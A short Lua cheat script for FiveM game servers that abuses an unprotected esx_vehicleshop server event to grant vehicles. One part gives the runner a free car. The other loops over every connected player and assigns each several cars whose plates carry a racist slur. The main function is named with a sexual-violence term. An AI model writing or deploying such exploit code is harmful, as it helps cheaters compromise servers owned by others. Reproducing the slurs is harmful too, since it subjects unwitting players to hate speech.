Give People Cars FiveM must be saved as .lua --[[ esx_vehicleshop free vehicle ]] local vehicleProps = { model = GetHashKey('sultanrs'), plate = 'ABC 123' } TriggerServerEvent('esx_vehicleshop:setVehicleOwnedPlayerId', GetPlayerServerId(PlayerId()), vehicleProps) --[[ esx_vehicleshop raid server ]] local rapeWithVehicleshop = function() local randomVehicles = { 'sultan', 'sultanrs', 'elegy', 'comet', 'comet2', 'comet3', 'coquette', 'bestiagts', } for key, value in pairs(GetActivePlayers()) do for _key, _value in pairs(randomVehicles) do Citizen.Wait(50) local rplate = (' Gucci#0001 ON TOP NIGGERS '..math.random(10000, 99999)) TriggerServerEvent('esx_vehicleshop:setVehicleOwnedPlayerId', GetPlayerServerId(value), {model = GetHashKey(_value), plate = rplate}) print(GetPlayerName(value)..' - now owns: '.._value..' | with this plate: '..rplate) end end end Citizen.CreateThread(rapeWithVehicleshop)